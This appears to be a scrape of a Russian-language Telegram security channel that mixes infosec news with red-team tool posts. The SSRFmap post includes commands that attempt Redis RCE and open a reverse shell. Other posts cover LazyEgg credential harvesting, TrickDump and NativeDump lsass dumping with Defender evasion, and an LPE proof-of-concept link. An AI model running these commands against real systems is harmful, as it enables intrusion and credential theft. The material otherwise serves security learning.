PDF или SVG smuggling, PDF polyglot, PDF luring в докладе Константина Полишина об актуальных методах проведения фишинга в рамках Red team проектов являются дополнением к материалам PHD12.
С первой частью составного доклада по этой теме можно ознакомиться по следующей ссылке. В прошлогоднем выпуске PT также расписан материал первой части.
Приятного просмотра
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
Кто стучится в почту? Social engineering 2024
В рамках этого доклада спикер расскажет о разновидностях полезной нагрузки, которые не попали в материал выступления на PHDays 12, но являются не менее востребованными и актуальными как эффективные векторы для получения начального доступа. Возможно, этот…
❤🔥6🆒4 4
Именно сегодня, в 19:00
В этом году лаборатория инновационных технологий и кибербезопасности компании AP Security принимала участие в нескольких номинациях.
Данное мероприятие является праздником для энтузиастов информационной безопасности и позволяет раскрыть в себе творческий и профессиональный потенциал, оценить свои силы, познакомиться с единомышленниками и вдохновиться на что-то новое и интересное.
Мы также в онлайне будем радоваться успехам всех финалистов данной премии и поздравлять своих коллег с попадаем на торжественную церемонию.
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
Pentest award 2024: церемония награждения
Раз в году у этичных хакеров появляется шанс громко заявить о своих достижениях, показать свой вклад в развитие российского рынка ИБ и обменяться лучшими историями из практики на церемонии награждения Pentest award.
В этот раз вас ждут 6 номинаций, по три…
В этот раз вас ждут 6 номинаций, по три…
#infosec
🐶 Новый PyPI-пакет Zlibxjson крадет данные Discord и браузеров
Вредоносный пакет под названием zlibxjson версии 8.2 был отмечен системой обнаружения вредоносного ПО, управляемой искусственным интеллектом компании Fortinet.
Было замечено, что пакет тайно загружает несколько файлов, включая исполняемый файл (.exe) с пакетом PyInstaller, который при распаковке содержит несколько файлов Python и DLL.
Среди них особенно опасными оказались три Python-скрипта - Discord_token_grabber.py, get_cookies.py и password_grabber.py.
📱 Windows-версия WhatsApp позволяет запускать Python и PHP без предупреждения
Проблема в безопасности последней версии WhatsApp (принадлежит компании Meta, признанной экстремистской и запрещенной в России) для Windows позволяет отправлять Python- и PHP-вложения, которые будут выполняться на устройстве пользователя без каких-либо предупреждений.
Для успешной эксплуатации этого бага в системе жертвы должен быть установлен Python. Это условие может сузить список потенциальных жертв до разработчиков софта.
🔔 Власти Израиля изъяли документы и компьютеры у создателей шпионской программы Pegasus, чтобы они не попали в США
Утечка из Министерства юстиции Израиля указывает на то, что правительство страны изъяло документы и компьютеры у компании NSO Group, чтобы предотвратить передачу потенциально компрометирующих материалов в рамках судебного процесса в США. Об этом в конце июля 2024 г. сообщило The Guardian.
По информации The Guardian, ставки запредельно высоки, поскольку судебное разбирательство может раскрыть исключительно секретную информацию, касающуюся шпионского программного обеспечения (ПО) под названием Pegasus, одного из самых известных хакерских инструментов в мире.
Вредоносный пакет под названием zlibxjson версии 8.2 был отмечен системой обнаружения вредоносного ПО, управляемой искусственным интеллектом компании Fortinet.
Было замечено, что пакет тайно загружает несколько файлов, включая исполняемый файл (.exe) с пакетом PyInstaller, который при распаковке содержит несколько файлов Python и DLL.
Среди них особенно опасными оказались три Python-скрипта - Discord_token_grabber.py, get_cookies.py и password_grabber.py.
Проблема в безопасности последней версии WhatsApp (принадлежит компании Meta, признанной экстремистской и запрещенной в России) для Windows позволяет отправлять Python- и PHP-вложения, которые будут выполняться на устройстве пользователя без каких-либо предупреждений.
Для успешной эксплуатации этого бага в системе жертвы должен быть установлен Python. Это условие может сузить список потенциальных жертв до разработчиков софта.
Утечка из Министерства юстиции Израиля указывает на то, что правительство страны изъяло документы и компьютеры у компании NSO Group, чтобы предотвратить передачу потенциально компрометирующих материалов в рамках судебного процесса в США. Об этом в конце июля 2024 г. сообщило The Guardian.
По информации The Guardian, ставки запредельно высоки, поскольку судебное разбирательство может раскрыть исключительно секретную информацию, касающуюся шпионского программного обеспечения (ПО) под названием Pegasus, одного из самых известных хакерских инструментов в мире.
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Machete Hack
Автоматизация с помощью SSRFmap 👁🗨
Проверенный временем, инструмент для автоматизации SSRF атак, поддерживающий большое количество модулей, кодирование нагрузки для bypass'а WAF'ов, создание reverse shell соединения
☄️ https://github.com/swisskyrepo/SSRFmap ☄️
Ставим на хост
Поднимаем докер
Пример команды, где опция
Используем модуль
И в конце небольшой Cheat Sheet по SSRF💫
Проверенный временем, инструмент для автоматизации SSRF атак, поддерживающий большое количество модулей, кодирование нагрузки для bypass'а WAF'ов, создание reverse shell соединения
Ставим на хост
git clone https://github.com/swisskyrepo/SSRFmap
cd SSRFmap/
pip3 install -r requirements.txt
python3 ssrfmap.py
Поднимаем докер
git clone https://github.com/swisskyrepo/SSRFmap
docker build --no-cache -t ssrfmap .
docker run -it ssrfmap ssrfmap.py [OPTIONS]
docker run -it -v $(pwd):/usr/src/app ssrfmap ssrfmap.py
Пример команды, где опция
-r
—> запрос, сохраненный из Burp Suite, -p
—> тестируемый параметр, -m
—> используемые модулиpython ssrfmap.py -r request.txt -p url -m readfiles,portscan
Используем модуль
redis
, который сразу пробует проэксплуатировать RCE, где параметры LHOST
и LPORT
служат для создания reverse shellpython ssrfmap.py -r request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
И в конце небольшой Cheat Sheet по SSRF
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from K0N70R4
Теперь о текущем
Делаюсь своим опытом и скиллом написания скриптов для gdb
Признаюсь,братцы,вам: gdb это не страшная бабка из астрала, а очень добрый друг Каспер, который может облегчить вам жизнь
Ни раз сталкивался с тем, что нужно было что-то автоматизировать в отладчиках, работая с фаззерами
Поэтому берите и юзайте
Встречайте первую статью - Признаюсь, братцы, вам гдбшку я любил GDB Scripting Linux and Windows
Делаюсь своим опытом и скиллом написания скриптов для gdb
Признаюсь,братцы,вам: gdb это не страшная бабка из астрала, а очень добрый друг Каспер, который может облегчить вам жизнь
Ни раз сталкивался с тем, что нужно было что-то автоматизировать в отладчиках, работая с фаззерами
Поэтому берите и юзайте
Встречайте первую статью - Признаюсь, братцы, вам гдбшку я любил GDB Scripting Linux and Windows
Forwarded from K0N70R4
#osint
🔍 Telegram-OSINT
Отдельный репозиторий для поиска информации в Telegram, содержащий огромное количество ресурсов.
⚡️ Начинающим специалистам стоит не забывать про OPSEC при работе с ботами, требующими номер и собирающими информацию о Вашем аккаунте.
Отдельный репозиторий для поиска информации в Telegram, содержащий огромное количество ресурсов.
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - The-Osint-Toolbox/Telegram-OSINT: In-depth repository of Telegram OSINT resources covering, tools, techniques & tradecraft.
In-depth repository of Telegram OSINT resources covering, tools, techniques & tradecraft. - The-Osint-Toolbox/Telegram-OSINT
#tools #pentest
📎 PoC CVE-2024-21338
Уязвимость CVE-2024-21338 была обнаружена специалистами Avast в драйвере appid.sys Windows AppLocker, о чем они сообщили Microsoft в августе прошлого года, предупредив, что уязвимость уже активно эксплуатируют злоумышленники.
🟡 Подробнее об этой уязвимости написано в статье на Хакер.
Уязвимость CVE-2024-21338 была обнаружена специалистами Avast в драйвере appid.sys Windows AppLocker, о чем они сообщили Microsoft в августе прошлого года, предупредив, что уязвимость уже активно эксплуатируют злоумышленники.
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - Crowdfense/CVE-2024-21338: Windows AppLocker Driver (appid.sys) LPE
Windows AppLocker Driver (appid.sys) LPE. Contribute to Crowdfense/CVE-2024-21338 development by creating an account on GitHub.
❤🔥4 3⚡2👏2😎2🆒1
#forensics
📡 Kdrill
Инструмент на Python для проверки руткитов в ядре Windows.
Kdrill получает доступ к физической памяти и декодирует внутренние структуры ОС, чтобы исследовать их и проверить целостность.
Инструмент на Python для проверки руткитов в ядре Windows.
Kdrill получает доступ к физической памяти и декодирует внутренние структуры ОС, чтобы исследовать их и проверить целостность.
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - ExaTrack/Kdrill: Python tool to check rootkits in Windows kernel
Python tool to check rootkits in Windows kernel. Contribute to ExaTrack/Kdrill development by creating an account on GitHub.
❤🔥5🆒4 4
#infosec
🌟 Руководство OpenAI разделилось во мнениях относительно собственной технологии водяного знака ИИ
У OpenAI есть инструмент для автоматического нанесения водяных знаков на контент, созданный искусственным интеллектом, но руководство компании разделилось во мнении, стоит ли выпускать его в открытый доступ.
Инструмент якобы готов к выпуску, но проект уже два года находится во внутренней дискуссии.
Опрос, проведенный компанией в апреле 2023 года среди постоянных пользователей ChatGPT, показал, что почти треть из них отказались бы от этой технологии, главным образом потому, что она может обнаружить списывание и плагиат.
⚡️ Уязвимости 5G позволяют следить за владельцами мобильных устройств
Исследователи из Университета Пенсильвании на конференции Black Hat, которая проходит в Лас-Вегасе, продемонстрировали метод слежки за владельцами мобильных устройств с помощью baseband-брешей в 5G.
Используя кастомный инструмент 5GBaseChecker, специалисты выявили уязвимости в базовой полосе, которые применяют 5G-модемы таких производителей, как Samsung, MediaTek и Qualcomm (используются в телефонах Google, OPPO, OnePlus, Motorola и Samsung).
💰 Атака напрокат: в даркнете стоимость готовых ботнетов для массовых атак начинается от 99 долларов США
Эксперты Kaspersky Digital Footprint Intelligence проанализировали объявления о предоставлении услуг, связанных с эксплуатацией ботнетов в даркнете и специализированных Telegram-каналах.
Для создания ботнетов могут использоваться уязвимые пользовательские и корпоративные гаджеты, например со слабыми паролями: от умных камер до продвинутых промышленных устройств. Аналитики «Лаборатории Касперского» в первом полугодии 2024 года зафиксировали рост более чем в два раза числа заражённых IoT-устройств в Росcии по сравнению с аналогичным периодом в прошлом году.
Такие инструменты могут обладать индивидуальными настройками и различаться по способам заражения, типу используемого вредоносного ПО, инфраструктуре, методам обхода обнаружения. Их разрабатывают для продажи на теневом рынке, а стоимость зависит от качества. В объявлениях за 2024 год, которые проанализировали эксперты, самая низкая цена составила 99 долларов США, а самая высокая — 10 тысяч долларов США. Ботнеты также можно взять в аренду: стоимость такой услуги варьируется от 30 до 4 800 долларов США в месяц.
У OpenAI есть инструмент для автоматического нанесения водяных знаков на контент, созданный искусственным интеллектом, но руководство компании разделилось во мнении, стоит ли выпускать его в открытый доступ.
Инструмент якобы готов к выпуску, но проект уже два года находится во внутренней дискуссии.
Опрос, проведенный компанией в апреле 2023 года среди постоянных пользователей ChatGPT, показал, что почти треть из них отказались бы от этой технологии, главным образом потому, что она может обнаружить списывание и плагиат.
Исследователи из Университета Пенсильвании на конференции Black Hat, которая проходит в Лас-Вегасе, продемонстрировали метод слежки за владельцами мобильных устройств с помощью baseband-брешей в 5G.
Используя кастомный инструмент 5GBaseChecker, специалисты выявили уязвимости в базовой полосе, которые применяют 5G-модемы таких производителей, как Samsung, MediaTek и Qualcomm (используются в телефонах Google, OPPO, OnePlus, Motorola и Samsung).
Эксперты Kaspersky Digital Footprint Intelligence проанализировали объявления о предоставлении услуг, связанных с эксплуатацией ботнетов в даркнете и специализированных Telegram-каналах.
Для создания ботнетов могут использоваться уязвимые пользовательские и корпоративные гаджеты, например со слабыми паролями: от умных камер до продвинутых промышленных устройств. Аналитики «Лаборатории Касперского» в первом полугодии 2024 года зафиксировали рост более чем в два раза числа заражённых IoT-устройств в Росcии по сравнению с аналогичным периодом в прошлом году.
Такие инструменты могут обладать индивидуальными настройками и различаться по способам заражения, типу используемого вредоносного ПО, инфраструктуре, методам обхода обнаружения. Их разрабатывают для продажи на теневом рынке, а стоимость зависит от качества. В объявлениях за 2024 год, которые проанализировали эксперты, самая низкая цена составила 99 долларов США, а самая высокая — 10 тысяч долларов США. Ботнеты также можно взять в аренду: стоимость такой услуги варьируется от 30 до 4 800 долларов США в месяц.
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Machete Hack
This media is not supported in your browser
VIEW IN TELEGRAM
Недавно на github'е наткнулся на интересную утилиту LazyEgg, позволяющую добывать ссылки, фото, URL'ы, айпишники, креды, ключи по целевому URL, а также искать и анализировать js файлы по сигнатурам
https://github.com/schooldropout1337/lazyegg
git clone https://github.com/schooldropout1337/lazyegg.git
python lazyegg.py https://localhost:8080
python lazyegg.py https://localhost:8080/js --js_scan --w wordlist.txt
cat jsurls.txt | xargs -I{} bash -c 'echo -e "\ntarget : {}\n" && python lazyegg.py "{}" --js_urls --domains --ips --leaked_creds'
waybackurls vulnweb.com | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} bash -c 'python lazyegg.py "{}" --js_urls --domains --ips' > jsurls.log && cat jsurls.log | grep '\.' | sort -u
le-jsurl.zip
репозиторияPlease open Telegram to view this post
VIEW IN TELEGRAM
❤🔥11 6🆒3
Forwarded from K0N70R4
👌9
#tools #pentest
🪆 TrickDump ( lsass dump)
TrickDump генерирует дамп процесса lsass без создания файла Minidump, вместо этого генерируя 3 JSON и 1 ZIP файл с дампами областей памяти. В три шага:
🟥 Получение информации об ОС с помощью RtlGetVersion.
🟥 Получение привилегии SeDebugPrivilege с помощью NtOpenProcessToken и NtAdjustPrivilegeToken, открытие хэндла с помощью NtGetNextProcess и NtQueryInformationProcess, а затем получение информации о модулях с помощью NtQueryInformationProcess и NtReadVirtualMemory.
🟥 Получение привилегии SeDebugPrivilege, открытие хэндла, а затем сбор информации и дампа областей памяти с помощью функций NtQueryVirtualMemory и NtReadVirtualMemory.
Узнать о других подходах и нюансах работы с процессом lsaas можно в следующей статье.
TrickDump генерирует дамп процесса lsass без создания файла Minidump, вместо этого генерируя 3 JSON и 1 ZIP файл с дампами областей памяти. В три шага:
Узнать о других подходах и нюансах работы с процессом lsaas можно в следующей статье.
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - ricardojoserf/TrickDump: Dump lsass using only NTAPI functions creating 3 JSON and 1 ZIP file... and generate the MiniDump…
Dump lsass using only NTAPI functions creating 3 JSON and 1 ZIP file... and generate the MiniDump file later! - ricardojoserf/TrickDump
Incident Response Plan Workflow.pdf
1.3 MB
#soc
⚡️ Реагирование на инциденты
Короткий мануал с этапами реагирования на инциденты с наглядным разбором практических кейсов по ним.
Приятного прочтения📔
Короткий мануал с этапами реагирования на инциденты с наглядным разбором практических кейсов по ним.
Приятного прочтения
Please open Telegram to view this post
VIEW IN TELEGRAM
#infosec
⬇️ Microsoft закрыла 9 zero-days в обновлении прошедшего вторника.
Шесть из 9 уязвимостей использовались в дикой природе.
Среди них - ошибка обхода функции безопасности Windows Mark of the Web (MotW) (CVE-2024-38213), которая аналогична обходу SmartScreen, опубликованному в феврале.
«Злоумышленник, убедивший пользователя открыть вредоносный файл, может обойти SmartScreen, который обычно предупреждает пользователя о загруженных из Интернета файлах, которые Windows в противном случае пометила бы MotW», - пояснил ведущий инженер-программист Rapid7 Адам Барнетт (Adam Barnett).
👋 Miro заявила о прекращении работы аккаунтов из России и Республики Беларусь 12 сентября
В ответ на запрос пользовательницы сервиса в техподдержке ответили, что пользователи из РФ и РБ смогут пользоваться досками, если их аккаунт зарегистрирован в других странах.
🌟 В российских ИТ-компаниях взрывной спрос на программистов со знанием китайского языка
За семь месяцев число вакансий с таким критерием на рекрутинговых сайтах год к году выросло на 31–65%, преимущественно ищут программистов. По мнению экспертов, это связано с появлением ряда азиатских приложений на российском рынке, а также переходом на китайское оборудование для производства электроники. ИТ-компании также отмечают спрос на ИТ-специалистов и c корейским языком.
Шесть из 9 уязвимостей использовались в дикой природе.
Среди них - ошибка обхода функции безопасности Windows Mark of the Web (MotW) (CVE-2024-38213), которая аналогична обходу SmartScreen, опубликованному в феврале.
«Злоумышленник, убедивший пользователя открыть вредоносный файл, может обойти SmartScreen, который обычно предупреждает пользователя о загруженных из Интернета файлах, которые Windows в противном случае пометила бы MotW», - пояснил ведущий инженер-программист Rapid7 Адам Барнетт (Adam Barnett).
В ответ на запрос пользовательницы сервиса в техподдержке ответили, что пользователи из РФ и РБ смогут пользоваться досками, если их аккаунт зарегистрирован в других странах.
За семь месяцев число вакансий с таким критерием на рекрутинговых сайтах год к году выросло на 31–65%, преимущественно ищут программистов. По мнению экспертов, это связано с появлением ряда азиатских приложений на российском рынке, а также переходом на китайское оборудование для производства электроники. ИТ-компании также отмечают спрос на ИТ-специалистов и c корейским языком.
Please open Telegram to view this post
VIEW IN TELEGRAM
👌8⚡2🆒2😁1🤔1
Forwarded from Machete Hack
🪲Wayback Machine как средство для багхантинга 🪲
Наверное, многие слышали про сервис Wayback Machine https://archive.org/ , который с помощью поисковых роботов делает снапшоты разнообразных сайтов. 🌐
Но чем же данный сервис может помочь при багхантинге ❓
❗️Во-первых, данный сервис может помочь собрать , так называемые, low-hanging fruits.
Был случай, когда был Wayback Machine показал эндпоинт типа https://example/api/profile/+7хххххххххх, сразу содержащий уязвимость типа IDOR.
❗️Во-вторых, он позволяет найти устаревшие параметры, которые разработчики убрать забыли ,и в явную на проде не используются, но они все также могут содержаться уязвимости, что расширяет скоуп.
❗️В-третьих, сервис помогает найти дополнительные эндпоинты API , которые через обычный фронт бывает найти не так просто.
❗️ В дополнение, Wayback Machine имеет собственный API, позволяющие писать автоматизирующие скрипты https://archive.org/help/wayback_api.php. Либо же можно использовать готовые решения на гитхабе, например https://github.com/tomnomnom/waybackurls/
Наверное, многие слышали про сервис Wayback Machine https://archive.org/ , который с помощью поисковых роботов делает снапшоты разнообразных сайтов. 🌐
Но чем же данный сервис может помочь при багхантинге ❓
❗️Во-первых, данный сервис может помочь собрать , так называемые, low-hanging fruits.
Был случай, когда был Wayback Machine показал эндпоинт типа https://example/api/profile/+7хххххххххх, сразу содержащий уязвимость типа IDOR.
❗️Во-вторых, он позволяет найти устаревшие параметры, которые разработчики убрать забыли ,и в явную на проде не используются, но они все также могут содержаться уязвимости, что расширяет скоуп.
❗️В-третьих, сервис помогает найти дополнительные эндпоинты API , которые через обычный фронт бывает найти не так просто.
❗️ В дополнение, Wayback Machine имеет собственный API, позволяющие писать автоматизирующие скрипты https://archive.org/help/wayback_api.php. Либо же можно использовать готовые решения на гитхабе, например https://github.com/tomnomnom/waybackurls/
GitHub
GitHub - tomnomnom/waybackurls: Fetch all the URLs that the Wayback Machine knows about for a domain
Fetch all the URLs that the Wayback Machine knows about for a domain - tomnomnom/waybackurls
👏9❤4🎉3🤯1
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
Lets Go Around Defender with NativeDump
In this video, we will use native dump, the go variant, to bypass EDR and dump LSASS. We will do this with Defender enabled. We will also send the file off the box to another host for reading with Mimikatz. Check it out!
NativeDump:
https://github.com/r…
NativeDump:
https://github.com/r…
👏5⚡3✍3🆒3😴1